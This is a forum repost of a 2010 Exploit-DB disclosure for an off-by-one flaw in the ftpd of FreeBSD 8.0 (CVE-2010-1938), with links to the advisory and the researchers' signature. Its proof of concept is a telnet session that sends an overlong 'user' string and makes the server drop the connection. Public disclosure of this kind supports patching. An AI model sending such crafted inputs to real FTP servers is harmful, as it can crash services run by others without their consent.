begood Posted May 27, 2010 Report Posted May 27, 2010 # Title: FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05) # EDB-ID: 12762 # CVE-ID: (CVE-2010-1938) # OSVDB-ID: () # Author: Maksymilian Arciemowicz # Published: 2010-05-27 # Verified: no # Download Exploit Code# Download N/A view source# FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)# CVE-2010-1938# FreeBSD-SA-10:05# Credit: Maksymilian Arciemowicz and Adam Zabrocki## http://securityreason.com/achievement_securityalert/87# http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc# http://blog.pi3.com.pl/?p=111#PoC:Connected to localhost.Escape character is '^]'.220 127.cx FTP server (Version 6.00LS) ready.user cx331 Password required for cx.user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAConnection closed by foreign host.- -- Best Regards,- ------------------------pub 1024D/A6986BD6 2008-08-22uid Maksymilian Arciemowicz (cxib)<cxib@securityreason.com>sub 4096g/0889FA9A 2008-08-22http://securityreason.comhttp://securityreason.com/key/Arciemowicz.Maksymilian.gpg Quote